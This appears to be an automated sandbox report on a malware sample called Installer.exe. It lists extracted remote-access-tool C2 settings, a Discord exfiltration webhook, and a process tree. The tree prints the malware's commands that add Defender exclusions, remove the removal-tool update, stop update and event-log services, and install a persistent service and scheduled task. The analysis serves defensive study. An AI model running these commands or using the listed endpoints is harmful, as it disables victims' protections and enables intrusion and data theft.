Analysis
-
max time kernel
188s -
max time network
188s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
18-04-2024 22:05
Static task
static1
Behavioral task
behavioral1
Sample
Installer.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
Installer.exe
Resource
win10v2004-20240412-en
General
-
Target
Installer.exe
-
Size
12.6MB
-
MD5
e560d8abab1b94fa698c5164b10c4fa5
-
SHA1
7b7e2334f06610ebcb9ac796c471961df6a6c377
-
SHA256
817cac7fcfdc0f48444c45be772997707761e2ca1e43e8d53f8f7e0e7a1e42b0
-
SHA512
cc546819fbf9cb40c8bd7c9f686b2d7e189b624fc94a8075e0a43ebcf83d28ed4fc51227c3450e94de91e2c72ce6ce68d7f5e6f8e9e390406da4bcc32470af16
-
SSDEEP
196608:MgINJY5ucj/+mDZR65PzwNVnQwOsayF0RjPLIp+I3U84IXrTNtNp0GIUOueu/ty:MR+59nYRzw0wlF0RjPLIECU84EJ49h
Malware Config
Extracted
xenorat
jctestwindows.airdns.org
Xeno_rat_nd8913d
-
delay
5000
-
install_path
temp
-
port
45010
-
startup_name
WindowsErrorHandler
Extracted
growtopia
https://discord.com/api/webhooks/1199763266872803338/8vedcXoMcyExhe1xhBm5f8ncmafWmOB3pkulE0l8g9Pel0t3ziyr2V51cLTVEjYsE4Rj
Signatures
-
Detect ZGRat V1 35 IoCs
resource yara_rule behavioral1/memory/2504-60-0x00000000004F0000-0x000000000055C000-memory.dmp family_zgrat_v1 behavioral1/memory/2504-68-0x00000000004F0000-0x0000000000555000-memory.dmp family_zgrat_v1 behavioral1/memory/2504-69-0x00000000004F0000-0x0000000000555000-memory.dmp family_zgrat_v1 behavioral1/memory/2504-71-0x00000000004F0000-0x0000000000555000-memory.dmp family_zgrat_v1 behavioral1/memory/2504-73-0x00000000004F0000-0x0000000000555000-memory.dmp family_zgrat_v1 behavioral1/memory/2504-75-0x00000000004F0000-0x0000000000555000-memory.dmp family_zgrat_v1 behavioral1/memory/2504-77-0x00000000004F0000-0x0000000000555000-memory.dmp family_zgrat_v1 behavioral1/memory/2504-81-0x00000000004F0000-0x0000000000555000-memory.dmp family_zgrat_v1 behavioral1/memory/2504-79-0x00000000004F0000-0x0000000000555000-memory.dmp family_zgrat_v1 behavioral1/memory/2504-83-0x00000000004F0000-0x0000000000555000-memory.dmp family_zgrat_v1 behavioral1/memory/2504-85-0x00000000004F0000-0x0000000000555000-memory.dmp family_zgrat_v1 behavioral1/memory/2504-97-0x00000000004F0000-0x0000000000555000-memory.dmp family_zgrat_v1 behavioral1/memory/2504-99-0x00000000004F0000-0x0000000000555000-memory.dmp family_zgrat_v1 behavioral1/memory/2504-101-0x00000000004F0000-0x0000000000555000-memory.dmp family_zgrat_v1 behavioral1/memory/2504-105-0x00000000004F0000-0x0000000000555000-memory.dmp family_zgrat_v1 behavioral1/memory/2504-107-0x00000000004F0000-0x0000000000555000-memory.dmp family_zgrat_v1 behavioral1/memory/2504-109-0x00000000004F0000-0x0000000000555000-memory.dmp family_zgrat_v1 behavioral1/memory/2504-111-0x00000000004F0000-0x0000000000555000-memory.dmp family_zgrat_v1 behavioral1/memory/2504-103-0x00000000004F0000-0x0000000000555000-memory.dmp family_zgrat_v1 behavioral1/memory/2504-113-0x00000000004F0000-0x0000000000555000-memory.dmp family_zgrat_v1 behavioral1/memory/2504-115-0x00000000004F0000-0x0000000000555000-memory.dmp family_zgrat_v1 behavioral1/memory/2504-117-0x00000000004F0000-0x0000000000555000-memory.dmp family_zgrat_v1 behavioral1/memory/2504-119-0x00000000004F0000-0x0000000000555000-memory.dmp family_zgrat_v1 behavioral1/memory/2504-121-0x00000000004F0000-0x0000000000555000-memory.dmp family_zgrat_v1 behavioral1/memory/2504-123-0x00000000004F0000-0x0000000000555000-memory.dmp family_zgrat_v1 behavioral1/memory/2504-127-0x00000000004F0000-0x0000000000555000-memory.dmp family_zgrat_v1 behavioral1/memory/2504-129-0x00000000004F0000-0x0000000000555000-memory.dmp family_zgrat_v1 behavioral1/memory/2504-131-0x00000000004F0000-0x0000000000555000-memory.dmp family_zgrat_v1 behavioral1/memory/2504-133-0x00000000004F0000-0x0000000000555000-memory.dmp family_zgrat_v1 behavioral1/memory/2504-135-0x00000000004F0000-0x0000000000555000-memory.dmp family_zgrat_v1 behavioral1/memory/2504-137-0x00000000004F0000-0x0000000000555000-memory.dmp family_zgrat_v1 behavioral1/memory/2504-139-0x00000000004F0000-0x0000000000555000-memory.dmp family_zgrat_v1 behavioral1/memory/2504-125-0x00000000004F0000-0x0000000000555000-memory.dmp family_zgrat_v1 behavioral1/memory/2504-141-0x00000000004F0000-0x0000000000555000-memory.dmp family_zgrat_v1 behavioral1/memory/1988-311-0x000000001B200000-0x000000001B280000-memory.dmp family_zgrat_v1 -
Creates new service(s) 1 TTPs
-
Stops running service(s) 3 TTPs
-
Executes dropped EXE 9 IoCs
pid Process 2504 Ilkdt.exe 2016 WinHostMgr.exe 2240 WinErrorMgr.exe 2704 KeyGeneratorI.exe 1988 Sahyui1337.exe 888 KeyGeneratorI.exe 2120 WinErrorMgr.exe 464 Process not Found 996 bauwrdgwodhv.exe -
Loads dropped DLL 9 IoCs
pid Process 2232 Installer.exe 2232 Installer.exe 2232 Installer.exe 2232 Installer.exe 2232 Installer.exe 2232 Installer.exe 888 KeyGeneratorI.exe 2240 WinErrorMgr.exe 464 Process not Found -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
flow ioc 3 discord.com 4 discord.com 9 pastebin.com 10 pastebin.com -
Drops file in System32 directory 4 IoCs
description ioc Process File opened for modification C:\Windows\system32\MRT.exe WinHostMgr.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\system32\MRT.exe bauwrdgwodhv.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 996 set thread context of 2924 996 bauwrdgwodhv.exe 100 PID 996 set thread context of 1656 996 bauwrdgwodhv.exe 102 -
Drops file in Windows directory 2 IoCs
description ioc Process File created C:\Windows\wusa.lock wusa.exe File created C:\Windows\wusa.lock wusa.exe -
Launches sc.exe 14 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 1624 sc.exe 2948 sc.exe 2096 sc.exe 1368 sc.exe 2468 sc.exe 2380 sc.exe 2728 sc.exe 1768 sc.exe 1528 sc.exe 2428 sc.exe 2784 sc.exe 2196 sc.exe 1156 sc.exe 2112 sc.exe -
Detects Pyinstaller 1 IoCs
resource yara_rule behavioral1/files/0x002b000000015c25-24.dat pyinstaller -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2312 schtasks.exe -
Modifies data under HKEY_USERS 6 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\ROOT\CTLs explorer.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 60132dc4dc91da01 powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT explorer.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates explorer.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\ROOT\CRLs explorer.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2424 powershell.exe 1988 Sahyui1337.exe 1988 Sahyui1337.exe 2016 WinHostMgr.exe 1464 powershell.exe 2016 WinHostMgr.exe 2016 WinHostMgr.exe 2016 WinHostMgr.exe 2016 WinHostMgr.exe 2016 WinHostMgr.exe 2016 WinHostMgr.exe 2016 WinHostMgr.exe 2016 WinHostMgr.exe 2016 WinHostMgr.exe 2016 WinHostMgr.exe 2016 WinHostMgr.exe 2016 WinHostMgr.exe 2016 WinHostMgr.exe 2016 WinHostMgr.exe 996 bauwrdgwodhv.exe 1248 powershell.exe 996 bauwrdgwodhv.exe 996 bauwrdgwodhv.exe 996 bauwrdgwodhv.exe 996 bauwrdgwodhv.exe 996 bauwrdgwodhv.exe 996 bauwrdgwodhv.exe 996 bauwrdgwodhv.exe 996 bauwrdgwodhv.exe 996 bauwrdgwodhv.exe 996 bauwrdgwodhv.exe 996 bauwrdgwodhv.exe 996 bauwrdgwodhv.exe 1656 explorer.exe 1656 explorer.exe 1656 explorer.exe 1656 explorer.exe 1656 explorer.exe 1656 explorer.exe 1656 explorer.exe 1656 explorer.exe 1656 explorer.exe 1656 explorer.exe 1656 explorer.exe 1656 explorer.exe 1656 explorer.exe 1656 explorer.exe 1656 explorer.exe 1656 explorer.exe 1656 explorer.exe 1656 explorer.exe 1656 explorer.exe 1656 explorer.exe 1656 explorer.exe 1656 explorer.exe 1656 explorer.exe 1656 explorer.exe 1656 explorer.exe 1656 explorer.exe 1656 explorer.exe 1656 explorer.exe 1656 explorer.exe 1656 explorer.exe 1656 explorer.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 464 Process not Found -
Suspicious use of AdjustPrivilegeToken 14 IoCs
description pid Process Token: SeDebugPrivilege 2504 Ilkdt.exe Token: SeDebugPrivilege 2424 powershell.exe Token: SeDebugPrivilege 1988 Sahyui1337.exe Token: SeDebugPrivilege 1464 powershell.exe Token: SeShutdownPrivilege 844 powercfg.exe Token: SeShutdownPrivilege 1868 powercfg.exe Token: SeShutdownPrivilege 1864 powercfg.exe Token: SeShutdownPrivilege 852 powercfg.exe Token: SeDebugPrivilege 1248 powershell.exe Token: SeShutdownPrivilege 368 powercfg.exe Token: SeShutdownPrivilege 1640 powercfg.exe Token: SeShutdownPrivilege 2204 powercfg.exe Token: SeShutdownPrivilege 1828 powercfg.exe Token: SeLockMemoryPrivilege 1656 explorer.exe -
Suspicious use of WriteProcessMemory 55 IoCs
description pid Process procid_target PID 2232 wrote to memory of 2424 2232 Installer.exe 31 PID 2232 wrote to memory of 2424 2232 Installer.exe 31 PID 2232 wrote to memory of 2424 2232 Installer.exe 31 PID 2232 wrote to memory of 2424 2232 Installer.exe 31 PID 2232 wrote to memory of 2504 2232 Installer.exe 33 PID 2232 wrote to memory of 2504 2232 Installer.exe 33 PID 2232 wrote to memory of 2504 2232 Installer.exe 33 PID 2232 wrote to memory of 2504 2232 Installer.exe 33 PID 2232 wrote to memory of 2016 2232 Installer.exe 34 PID 2232 wrote to memory of 2016 2232 Installer.exe 34 PID 2232 wrote to memory of 2016 2232 Installer.exe 34 PID 2232 wrote to memory of 2016 2232 Installer.exe 34 PID 2232 wrote to memory of 2240 2232 Installer.exe 35 PID 2232 wrote to memory of 2240 2232 Installer.exe 35 PID 2232 wrote to memory of 2240 2232 Installer.exe 35 PID 2232 wrote to memory of 2240 2232 Installer.exe 35 PID 2232 wrote to memory of 2704 2232 Installer.exe 36 PID 2232 wrote to memory of 2704 2232 Installer.exe 36 PID 2232 wrote to memory of 2704 2232 Installer.exe 36 PID 2232 wrote to memory of 2704 2232 Installer.exe 36 PID 2232 wrote to memory of 1988 2232 Installer.exe 37 PID 2232 wrote to memory of 1988 2232 Installer.exe 37 PID 2232 wrote to memory of 1988 2232 Installer.exe 37 PID 2232 wrote to memory of 1988 2232 Installer.exe 37 PID 2704 wrote to memory of 888 2704 KeyGeneratorI.exe 40 PID 2704 wrote to memory of 888 2704 KeyGeneratorI.exe 40 PID 2704 wrote to memory of 888 2704 KeyGeneratorI.exe 40 PID 2240 wrote to memory of 2120 2240 WinErrorMgr.exe 43 PID 2240 wrote to memory of 2120 2240 WinErrorMgr.exe 43 PID 2240 wrote to memory of 2120 2240 WinErrorMgr.exe 43 PID 2240 wrote to memory of 2120 2240 WinErrorMgr.exe 43 PID 2120 wrote to memory of 2312 2120 WinErrorMgr.exe 44 PID 2120 wrote to memory of 2312 2120 WinErrorMgr.exe 44 PID 2120 wrote to memory of 2312 2120 WinErrorMgr.exe 44 PID 2120 wrote to memory of 2312 2120 WinErrorMgr.exe 44 PID 2252 wrote to memory of 584 2252 cmd.exe 53 PID 2252 wrote to memory of 584 2252 cmd.exe 53 PID 2252 wrote to memory of 584 2252 cmd.exe 53 PID 1544 wrote to memory of 2456 1544 cmd.exe 84 PID 1544 wrote to memory of 2456 1544 cmd.exe 84 PID 1544 wrote to memory of 2456 1544 cmd.exe 84 PID 996 wrote to memory of 2924 996 bauwrdgwodhv.exe 100 PID 996 wrote to memory of 2924 996 bauwrdgwodhv.exe 100 PID 996 wrote to memory of 2924 996 bauwrdgwodhv.exe 100 PID 996 wrote to memory of 2924 996 bauwrdgwodhv.exe 100 PID 996 wrote to memory of 2924 996 bauwrdgwodhv.exe 100 PID 996 wrote to memory of 2924 996 bauwrdgwodhv.exe 100 PID 996 wrote to memory of 2924 996 bauwrdgwodhv.exe 100 PID 996 wrote to memory of 2924 996 bauwrdgwodhv.exe 100 PID 996 wrote to memory of 2924 996 bauwrdgwodhv.exe 100 PID 996 wrote to memory of 1656 996 bauwrdgwodhv.exe 102 PID 996 wrote to memory of 1656 996 bauwrdgwodhv.exe 102 PID 996 wrote to memory of 1656 996 bauwrdgwodhv.exe 102 PID 996 wrote to memory of 1656 996 bauwrdgwodhv.exe 102 PID 996 wrote to memory of 1656 996 bauwrdgwodhv.exe 102
Processes
-
C:\Users\Admin\AppData\Local\Temp\Installer.exe"C:\Users\Admin\AppData\Local\Temp\Installer.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2232 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AbQBiACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAcABpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGcAbgBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHIAcQB2ACMAPgA="2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2424
-
-
C:\Users\Admin\AppData\Local\Temp\Ilkdt.exe"C:\Users\Admin\AppData\Local\Temp\Ilkdt.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2504
-
-
C:\Users\Admin\AppData\Local\Temp\WinHostMgr.exe"C:\Users\Admin\AppData\Local\Temp\WinHostMgr.exe"2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:2016 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1464
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart3⤵
- Suspicious use of WriteProcessMemory
PID:2252 -
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart4⤵
- Drops file in Windows directory
PID:584
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc3⤵
- Launches sc.exe
PID:1624
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:2728
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv3⤵
- Launches sc.exe
PID:2948
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits3⤵
- Launches sc.exe
PID:1768
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc3⤵
- Launches sc.exe
PID:2096
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:852
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1868
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1864
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:844
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "GMDTJRUT"3⤵
- Launches sc.exe
PID:1368
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "GMDTJRUT" binpath= "C:\ProgramData\vcnwldzucnvl\bauwrdgwodhv.exe" start= "auto"3⤵
- Launches sc.exe
PID:1528
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog3⤵
- Launches sc.exe
PID:2112
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "GMDTJRUT"3⤵
- Launches sc.exe
PID:1156
-
-
-
C:\Users\Admin\AppData\Local\Temp\WinErrorMgr.exe"C:\Users\Admin\AppData\Local\Temp\WinErrorMgr.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2240 -
C:\Users\Admin\AppData\Local\Temp\XenoManager\WinErrorMgr.exe"C:\Users\Admin\AppData\Local\Temp\XenoManager\WinErrorMgr.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2120 -
C:\Windows\SysWOW64\schtasks.exe"schtasks.exe" /Create /TN "WindowsErrorHandler" /XML "C:\Users\Admin\AppData\Local\Temp\tmpFDEE.tmp" /F4⤵
- Creates scheduled task(s)
PID:2312
-
-
-
-
C:\Users\Admin\AppData\Roaming\KeyGeneratorI.exe"C:\Users\Admin\AppData\Roaming\KeyGeneratorI.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2704 -
C:\Users\Admin\AppData\Roaming\KeyGeneratorI.exe"C:\Users\Admin\AppData\Roaming\KeyGeneratorI.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:888
-
-
-
C:\Users\Admin\AppData\Local\Temp\Sahyui1337.exe"C:\Users\Admin\AppData\Local\Temp\Sahyui1337.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1988
-
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe"1⤵PID:1036
-
C:\ProgramData\vcnwldzucnvl\bauwrdgwodhv.exeC:\ProgramData\vcnwldzucnvl\bauwrdgwodhv.exe1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:996 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1248
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart2⤵
- Suspicious use of WriteProcessMemory
PID:1544 -
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart3⤵
- Drops file in Windows directory
PID:2456
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc2⤵
- Launches sc.exe
PID:2380
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc2⤵
- Launches sc.exe
PID:2468
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv2⤵
- Launches sc.exe
PID:2428
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits2⤵
- Launches sc.exe
PID:2784
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc2⤵
- Launches sc.exe
PID:2196
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵
- Suspicious use of AdjustPrivilegeToken
PID:368
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵
- Suspicious use of AdjustPrivilegeToken
PID:1828
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵
- Suspicious use of AdjustPrivilegeToken
PID:1640
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵
- Suspicious use of AdjustPrivilegeToken
PID:2204
-
-
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe2⤵PID:2924
-
-
C:\Windows\explorer.exeexplorer.exe2⤵
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1656
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
316KB
MD5675d9e9ab252981f2f919cf914d9681d
SHA17485f5c9da283475136df7fa8b62756efbb5dd17
SHA2560f055835332ef8e368185ae461e7c9eacdeb3d600ea550d605b09a20e0856e2d
SHA5129dd936705fd43ebe8be17fcf77173eaaf16046f5880f8fe48fc68ded91ef6202ba65c605980bd2e330d2c7f463f772750a1bd96246fffdc9cb6bf8e1b00a2ccb
-
Filesize
6.7MB
MD548ebfefa21b480a9b0dbfc3364e1d066
SHA1b44a3a9b8c585b30897ddc2e4249dfcfd07b700a
SHA2560cc4e557972488eb99ea4aeb3d29f3ade974ef3bcd47c211911489a189a0b6f2
SHA5124e6194f1c55b82ee41743b35d749f5d92a955b219decacf9f1396d983e0f92ae02089c7f84a2b8296a3062afa3f9c220da9b7cd9ed01b3315ea4a953b4ecc6ce
-
Filesize
1KB
MD57f673f709ab0e7278e38f0fd8e745cd4
SHA1ac504108a274b7051e3b477bcd51c9d1a4a01c2c
SHA256da5ab3278aaa04fbd51272a617aef9b903ca53c358fac48fc0f558e257e063a4
SHA512e932ccbd9d3ec6ee129f0dab82710904b84e657532c5b623d3c7b3b4ce45732caf8ff5d7b39095cf99ecf97d4e40dd9d755eb2b89c8ede629b287c29e41d1132
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\LH1OOSU3M8X22XPD6Q39.temp
Filesize7KB
MD5a5e879c79094f55446393a7f551b2cc3
SHA1c0526922e575e9bd0f053d18b11094753c93596e
SHA2563f8be8d6b2302947c879e9e469d31bb8365dbe9d435069171883b4ce19bb87ac
SHA51278d091b9fe5854d60c913b4d22f540e42a826cd1c470f74085cd0427acd43bc924fa13bdb559f77afcde422318c9b76c2e62eb59ce78edea6113142a4cceb4d8
-
Filesize
191KB
MD5e004a568b841c74855f1a8a5d43096c7
SHA1b90fd74593ae9b5a48cb165b6d7602507e1aeca4
SHA256d49013d6be0f0e727c0b53bce1d3fed00656c7a2836ceef0a9d4cb816a5878db
SHA512402dd4d4c57fb6f5c7a531b7210a897dfe41d68df99ae4d605944f6e5b2cecaafa3fe27562fe45e7e216a7c9e29e63139d4382310b41f04a35ad56115fbed2af
-
Filesize
42KB
MD5d499e979a50c958f1a67f0e2a28af43d
SHA11e5fa0824554c31f19ce01a51edb9bed86f67cf0
SHA256bc3d545c541e42420ce2c2eabc7e5afab32c869a1adb20adb11735957d0d0b0e
SHA512668047f178d82bebefeb8c2e7731d34ff24dc755dacd3362b43d8b44c6b148fc51af0d0ab2d0a67f0344ab6158b883fe568e4eeb0e34152108735574f0e1e763
-
Filesize
5.0MB
MD5e222309197c5e633aa8e294ba4bdcd29
SHA152b3f89a3d2262bf603628093f6d1e71d9cc3820
SHA256047a7ca1b8848c1c0e3c0fcc6ece056390760b24580f27f6966b86b0c2a1042b
SHA5129eb37686e0cee9ec18d12a4edd37c8334d26650c74eae5b30231c2b0db1628d52848123c9348c3da306ec950b827ec0a56cdf43ee325a9e280022c68193d8503
-
Filesize
6.9MB
MD5d1ebfb3ff83375dc6897e50a95e8b2a5
SHA1fd1cb7ac0181ee647419761871dd78ad0a09d44a
SHA256ec709b3a8a2d6df0c990303226ef5d8fea4d4270add2d06e69b0db8b913fcd06
SHA512f210610472f34ff991a93bf290deb7d76e38b11d534b21ac689f53432e018e12792d801d38afbfd722fdaea21f4cad47ca5a09b2f7c983d73cec57e01a9d5d63